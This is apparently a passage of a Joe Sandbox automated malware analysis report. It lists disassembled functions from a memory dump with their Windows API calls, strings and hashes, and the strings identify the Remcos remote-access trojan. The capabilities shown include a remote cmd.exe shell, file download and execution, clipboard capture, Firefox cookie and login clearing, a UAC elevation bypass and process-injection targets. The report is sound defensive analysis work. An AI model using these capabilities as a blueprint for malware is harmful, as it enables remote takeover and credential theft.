                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$ForegroundText
                                      • String ID:
                                      • API String ID: 29597999-0
                                      • Opcode ID: 9dde3d0392ee3c84791d518730962e601b313450ff0feac9d11c5117441fa7d1
                                      • Instruction ID: 045779486e98685dcdad0f274429eaa14c0ca5a26629fe951a7b0507ab6a2560
                                      • Opcode Fuzzy Hash: 9dde3d0392ee3c84791d518730962e601b313450ff0feac9d11c5117441fa7d1
                                      • Instruction Fuzzy Hash: C1E0D871E40338A7E720A7A49C8DFE57B7CEB04740F0000D9B618D71C1EAB0A914CBE0
                                      Function 02B14EE9 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • getaddrinfo.WS2_32(00000000,00000000,00000000,02B72ADC,02B750E4,00000000,02B15188,00000000,00000001), ref: 02B14F0B
                                      • WSASetLastError.WS2_32(00000000), ref: 02B14F10
                                        • Part of subcall function 02B14D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02B14DD5
                                        • Part of subcall function 02B14D86: LoadLibraryA.KERNEL32(?), ref: 02B14E17
                                        • Part of subcall function 02B14D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02B14E37
                                        • Part of subcall function 02B14D86: FreeLibrary.KERNEL32(00000000), ref: 02B14E3E
                                        • Part of subcall function 02B14D86: LoadLibraryA.KERNEL32(?), ref: 02B14E76
                                        • Part of subcall function 02B14D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02B14E88
                                        • Part of subcall function 02B14D86: FreeLibrary.KERNEL32(00000000), ref: 02B14E8F
                                        • Part of subcall function 02B14D86: GetProcAddress.KERNEL32(00000000,?), ref: 02B14E9E
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                      • String ID:
                                      • API String ID: 1170566393-0
                                      • Opcode ID: 6daa216aaf0d6b9b86ac71faf20bf2437050945afe7e5649a0575edd51a08f70
                                      • Instruction ID: 480253779a1c4ff2966255ee8aecd150b5484351121af2dbe8150b3a1ef19a2e
                                      • Opcode Fuzzy Hash: 6daa216aaf0d6b9b86ac71faf20bf2437050945afe7e5649a0575edd51a08f70
                                      • Instruction Fuzzy Hash: 61D01732A415216BE320A66DAC01BBAABADDB977A0B550466F914D3200D6908C5186E0
                                      Function 02B0D069 Relevance: 3.0, APIs: 2, Instructions: 13synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,02B0EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,02B660BC,00000003,00000000), ref: 02B0D078
                                      • GetLastError.KERNEL32 ref: 02B0D083
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateErrorLastMutex
                                      • String ID:
                                      • API String ID: 1925916568-0
                                      • Opcode ID: afcccd6f62e90587e5cece9b79c382b341491d0d85c27700162bf47136729bb4
                                      • Instruction ID: a6b2cfd304605848f4bdf64215d935b8e88e9bde0104fcb5ae732a29b1673a7d
                                      • Opcode Fuzzy Hash: afcccd6f62e90587e5cece9b79c382b341491d0d85c27700162bf47136729bb4
                                      • Instruction Fuzzy Hash: EBD012B1E95710DBDB181774D49975939959744741F800859B907CE9D0CA6544A08A11
                                      Function 02B09DE4 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID:
                                      • API String ID: 176396367-0
                                      • Opcode ID: 3f8191f89fcd14349dcf41c962c7290a2698fb3a064ce1239c486a554687c74e
                                      • Instruction ID: 1f3b234ec08113fff9c9415f8877f44306a6055bafb73ae6e66749d0fd2c1839
                                      • Opcode Fuzzy Hash: 3f8191f89fcd14349dcf41c962c7290a2698fb3a064ce1239c486a554687c74e
                                      • Instruction Fuzzy Hash: 3A1193319002059BCB1AEF68E8909EF7FBAAF14310B000099E816532E0EF74AD59CF50
                                      Function 02B46137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,02B3529C,?,?,02B38847,?,?,00000000,?,?,02B0DE62,02B3529C,?,?,?,?), ref: 02B46169
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 3fa9458fe9cb10b1570a1cf6a6ca0cd4aa27752fe8b7673e68b5d6464a6e8a3d
                                      • Instruction ID: 2d46d7b65332b4880006ffa6fd5d57cba6b0904d0a7ca6cf2723d1a89edfcb40
                                      • Opcode Fuzzy Hash: 3fa9458fe9cb10b1570a1cf6a6ca0cd4aa27752fe8b7673e68b5d6464a6e8a3d
                                      • Instruction Fuzzy Hash: 6BE06D31D4062567EB2226699C84B5B775EDF433A2F4562A1ED5696082DF20D880A6E0
                                      Function 02B0489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAStartup.WS2_32(00000202,00000000), ref: 02B048B3
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Startup
                                      • String ID:
                                      • API String ID: 724789610-0
                                      • Opcode ID: e1fea8fd03a4b8eb96f9675cb39f35efa17a4955f64088afecdb749686fb23a3
                                      • Instruction ID: ba9e3d3ee934738c5c726242e54b1e82c3e5d505584d1474597966ce5148d5b3
                                      • Opcode Fuzzy Hash: e1fea8fd03a4b8eb96f9675cb39f35efa17a4955f64088afecdb749686fb23a3
                                      • Instruction Fuzzy Hash: 4AD0123299871C8EF620AAB4AC0F9E4776CC312655F040BAA6CB5C35C2E644272DC2F7

                                      Non-executed Functions

                                      Function 02B07C97 Relevance: 34.1, APIs: 10, Strings: 9, Instructions: 835filesleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetEvent.KERNEL32(?,?), ref: 02B07CB9
                                      • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 02B07D87
                                      • DeleteFileW.KERNEL32(00000000), ref: 02B07DA9
                                        • Part of subcall function 02B1C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C2EC
                                        • Part of subcall function 02B1C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C31C
                                        • Part of subcall function 02B1C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C371
                                        • Part of subcall function 02B1C291: FindClose.KERNEL32(00000000,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C3D2
                                        • Part of subcall function 02B1C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C3D9
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                        • Part of subcall function 02B04AA1: WaitForSingleObject.KERNEL32(?,00000000,02B0547D,?,?,00000004,?,?,00000004,?,02B74EF8,?), ref: 02B04B47
                                        • Part of subcall function 02B04AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,02B74EF8,?,?,?,?,?,?,02B0547D), ref: 02B04B75
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 02B08197
                                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 02B08278
                                      • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 02B084C4
                                      • DeleteFileA.KERNEL32(?), ref: 02B08652
                                        • Part of subcall function 02B0880C: __EH_prolog.LIBCMT ref: 02B08811
                                        • Part of subcall function 02B0880C: FindFirstFileW.KERNEL32(00000000,?,02B66608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B088CA
                                        • Part of subcall function 02B0880C: __CxxThrowException@8.LIBVCRUNTIME ref: 02B088F2
                                        • Part of subcall function 02B0880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B088FF
                                      • Sleep.KERNEL32(000007D0), ref: 02B086F8
                                      • StrToIntA.SHLWAPI(00000000,00000000), ref: 02B0873A
                                        • Part of subcall function 02B1C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 02B1CAD7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                      • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                      • API String ID: 1067849700-1507758755
                                      • Opcode ID: 69d20d77af24f481a01b134bf5a328dd807ea7a46eb5098cffffd82f09afb4cc
                                      • Instruction ID: 5af2af81d95d7f0792484b3011c209adc0ef54b4a3c9522b5c0311f61c7d2e5e
                                      • Opcode Fuzzy Hash: 69d20d77af24f481a01b134bf5a328dd807ea7a46eb5098cffffd82f09afb4cc
                                      • Instruction Fuzzy Hash: 49428471A143006BD61AFB78C8D5DAE7FAAAF91340F8009DCE546571D4EF649A08CF93
                                      Function 02B0569A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 02B056E6
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      • __Init_thread_footer.LIBCMT ref: 02B05723
                                      • CreatePipe.KERNEL32(02B76CCC,02B76CB4,02B76BD8,00000000,02B660BC,00000000), ref: 02B057B6
                                      • CreatePipe.KERNEL32(02B76CB8,02B76CD4,02B76BD8,00000000), ref: 02B057CC
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,02B76BE8,02B76CBC), ref: 02B0583F
                                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 02B05897
                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02B058BC
                                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 02B058E9
                                        • Part of subcall function 02B34770: __onexit.LIBCMT ref: 02B34776
                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,02B74F90,02B660C0,00000062,02B660A4), ref: 02B059E4
                                      • Sleep.KERNEL32(00000064,00000062,02B660A4), ref: 02B059FE
                                      • TerminateProcess.KERNEL32(00000000), ref: 02B05A17
                                      • CloseHandle.KERNEL32 ref: 02B05A23
                                      • CloseHandle.KERNEL32 ref: 02B05A2B
                                      • CloseHandle.KERNEL32 ref: 02B05A3D
                                      • CloseHandle.KERNEL32 ref: 02B05A45
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                      • String ID: SystemDrive$cmd.exe
                                      • API String ID: 2994406822-3633465311
                                      • Opcode ID: e272dd41ab09e0e85da2d0d6c71370960aec44e55da7b4387cf19bc616482b11
                                      • Instruction ID: dc683c23508a5138901edde51f445b8689bd47dd53ea069160c0f81bc91441a0
                                      • Opcode Fuzzy Hash: e272dd41ab09e0e85da2d0d6c71370960aec44e55da7b4387cf19bc616482b11
                                      • Instruction Fuzzy Hash: 5A91C271A84604AFE716AB35ACC5A2E3FAEEB40380F4008ADF956976D0DF255C588F61
                                      Function 02B120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcessId.KERNEL32 ref: 02B12106
                                        • Part of subcall function 02B13877: RegCreateKeyA.ADVAPI32(80000001,00000000,02B660A4), ref: 02B13885
                                        • Part of subcall function 02B13877: RegSetValueExA.KERNEL32(02B660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,02B0C152,02B66C48,00000001,000000AF,02B660A4), ref: 02B138A0
                                        • Part of subcall function 02B13877: RegCloseKey.KERNEL32(02B660A4,?,?,?,02B0C152,02B66C48,00000001,000000AF,02B660A4), ref: 02B138AB
                                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 02B12146
                                      • CloseHandle.KERNEL32(00000000), ref: 02B12155
                                      • CreateThread.KERNEL32(00000000,00000000,02B127EE,00000000,00000000,00000000), ref: 02B121AB
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 02B1241A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                      • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                      • API String ID: 3018269243-13974260
                                      • Opcode ID: 588940b4fb966372af112db6a168420f83a8d37f77573964ab9d7f1fb9a2566a
                                      • Instruction ID: 4fa45891682b674993ab92727cb88873bdf9c7c3f701e619f35703b0cc784af0
                                      • Opcode Fuzzy Hash: 588940b4fb966372af112db6a168420f83a8d37f77573964ab9d7f1fb9a2566a
                                      • Instruction Fuzzy Hash: AB71A5315143105BE61AFB74DC9A97E7BAAAF90340F8009EDB987570E0FF649908CE92
                                      Function 02B0BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 02B0BBAF
                                      • FindClose.KERNEL32(00000000), ref: 02B0BBC9
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02B0BCEC
                                      • FindClose.KERNEL32(00000000), ref: 02B0BD12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFile$FirstNext
                                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                      • API String ID: 1164774033-3681987949
                                      • Opcode ID: a668be54d20d43888e605f6142a606f49d247fab18c1ee089698fa8b138691da
                                      • Instruction ID: ec439c2ab999ef42377f86d05d144fbf4eb9d396bcbf00e2563963bffe8c6850
                                      • Opcode Fuzzy Hash: a668be54d20d43888e605f6142a606f49d247fab18c1ee089698fa8b138691da
                                      • Instruction Fuzzy Hash: 265153319102199AEB1AF7B4DCD9EFD7F3AAF10340F4005D9E41AA61D0EF345A99CE91
                                      Function 02B0BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 02B0BDAF
                                      • FindClose.KERNEL32(00000000), ref: 02B0BDC9
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02B0BE89
                                      • FindClose.KERNEL32(00000000), ref: 02B0BEAF
                                      • FindClose.KERNEL32(00000000), ref: 02B0BED0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$Close$File$FirstNext
                                      • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                      • API String ID: 3527384056-432212279
                                      • Opcode ID: 781602e1c1775ab672992b9331f2db8ebf0fd858ed68fefbea5984625d0a0709
                                      • Instruction ID: 93de223d41fbec0cd27eaca13243be2ff43de8b5d96313df4a31f3016cad0b06
                                      • Opcode Fuzzy Hash: 781602e1c1775ab672992b9331f2db8ebf0fd858ed68fefbea5984625d0a0709
                                      • Instruction Fuzzy Hash: 554190319402199AEB1AF7B4DC99DFDBB6AEF11340F4005D9E40AA70D0EF255A8ACE91
                                      Function 02B168C1 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32 ref: 02B168C2
                                      • EmptyClipboard.USER32 ref: 02B168D0
                                      • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 02B168F0
                                      • GlobalLock.KERNEL32(00000000), ref: 02B168F9
                                      • GlobalUnlock.KERNEL32(00000000), ref: 02B1692F
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 02B16938
                                      • CloseClipboard.USER32 ref: 02B16955
                                      • OpenClipboard.USER32 ref: 02B1695C
                                      • GetClipboardData.USER32(0000000D), ref: 02B1696C
                                      • GlobalLock.KERNEL32(00000000), ref: 02B16975
                                      • GlobalUnlock.KERNEL32(00000000), ref: 02B1697E
                                      • CloseClipboard.USER32 ref: 02B16984
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                      • String ID:
                                      • API String ID: 3520204547-0
                                      • Opcode ID: 8a2c70aa82bcc27024c3e774331be4eec48085c1145a3e4c22b6575a543f8b55
                                      • Instruction ID: 7ed140a62d14d1a1bf404cd8cf98351531f0a871120b51b764b7715693925188
                                      • Opcode Fuzzy Hash: 8a2c70aa82bcc27024c3e774331be4eec48085c1145a3e4c22b6575a543f8b55
                                      • Instruction Fuzzy Hash: 64217472A54710EFC719BBB4D89CB7E7BAAAF84781F444C9DF506871C0EF248854CAA1
                                      Function 02B0F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,02B750E4,?,02B75338), ref: 02B0F48E
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,02B75338), ref: 02B0F4B9
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 02B0F4D5
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 02B0F554
                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,02B75338), ref: 02B0F563
                                        • Part of subcall function 02B1C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02B1C1F5
                                        • Part of subcall function 02B1C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02B1C208
                                      • CloseHandle.KERNEL32(00000000,?,02B75338), ref: 02B0F66E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                      • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                      • API String ID: 3756808967-1743721670
                                      • Opcode ID: a4c8c511f0497a3ece09c288d4e74cd26a9c2f0fb977425022e20484258a2bf8
                                      • Instruction ID: 14648a97fab6b802a5dd53cb7420235356f1b530f82beab04c13b8adf8df7c38
                                      • Opcode Fuzzy Hash: a4c8c511f0497a3ece09c288d4e74cd26a9c2f0fb977425022e20484258a2bf8
                                      • Instruction Fuzzy Hash: DB7152705183419BD72AFB64D4D49AEBBAABF90344F40089DE58A431E1EF34E94DCF52
                                      Function 02B19627 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 206COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 0$1$2$3$4$5$6$7
                                      • API String ID: 0-3177665633
                                      • Opcode ID: e2ac9a3aedb60b92a23c8c758cd466b8af302bd5d8832b25f80caa50dec88d23
                                      • Instruction ID: 5f47b8068e39ce7c51c559ec975bdfb376ea7a84d284ac2715ac806da705c831
                                      • Opcode Fuzzy Hash: e2ac9a3aedb60b92a23c8c758cd466b8af302bd5d8832b25f80caa50dec88d23
                                      • Instruction Fuzzy Hash: 9A71C1705083419FD329EF20D8A0BAABBD5AF85350F84499DF5A3571D0DB74AB88CF92
                                      Function 02B074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 02B07521
                                      • CoGetObject.OLE32(?,00000024,02B66518,00000000), ref: 02B07582
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Object_wcslen
                                      • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                      • API String ID: 240030777-3166923314
                                      • Opcode ID: b02012d8c842ee6dfcd3880b39794fb926a9979b154a4edf676d0427dea702b7
                                      • Instruction ID: 0217e953dff4ace8192481fb7f6aca6b11fad14ca38fa0b0a531e74921746226
                                      • Opcode Fuzzy Hash: b02012d8c842ee6dfcd3880b39794fb926a9979b154a4edf676d0427dea702b7
                                      • Instruction Fuzzy Hash: A0118A72940218BBE711EA988889AEEFB7CDB08710F1400D6F515A3141EF78AA44CAB1
                                      Function 02B1A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,02B758E8), ref: 02B1A75E
                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 02B1A7AD
                                      • GetLastError.KERNEL32 ref: 02B1A7BB
                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 02B1A7F3
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                      • String ID:
                                      • API String ID: 3587775597-0
                                      • Opcode ID: 9d65089bfee32d5cd712067bd2e44a78eac9b53349cc49ee9bbedd50b9ae1d94
                                      • Instruction ID: 56bf37eb85fcce77421a0a818d6a09a9bff841f69774b785d35b9dc7413d3bd0
                                      • Opcode Fuzzy Hash: 9d65089bfee32d5cd712067bd2e44a78eac9b53349cc49ee9bbedd50b9ae1d94
                                      • Instruction Fuzzy Hash: 7C814D71504304ABC306EB60D894EAFBBE9FF94354F50499EF58656190EF70EA09CF92
                                      Function 02B0C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 02B0C39B
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 02B0C46E
                                      • FindClose.KERNEL32(00000000), ref: 02B0C47D
                                      • FindClose.KERNEL32(00000000), ref: 02B0C4A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFile$FirstNext
                                      • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                      • API String ID: 1164774033-405221262
                                      • Opcode ID: 4bfe174787f98c1fa601c1092289ef21121e9f9653bb56671bc7b93674417f0d
                                      • Instruction ID: 5dc4cb2949afd2e67a577e5e6ff229eadac119bc70ac0268dcbb122f7b439fd3
                                      • Opcode Fuzzy Hash: 4bfe174787f98c1fa601c1092289ef21121e9f9653bb56671bc7b93674417f0d
                                      • Instruction Fuzzy Hash: D1316031914219AADB1AF7A4DCD8DFD7F7EBF10754F0001DAA10AA20D1EF749A89CE54
                                      Function 02B1C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C2EC
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C31C
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C38E
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C39B
                                        • Part of subcall function 02B1C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C371
                                      • GetLastError.KERNEL32(?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C3BC
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C3D2
                                      • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C3D9
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C3E2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                      • String ID:
                                      • API String ID: 2341273852-0
                                      • Opcode ID: 7e53b55336133014ef757f42cdece6438e370a336639ccae7e1b34883113f87f
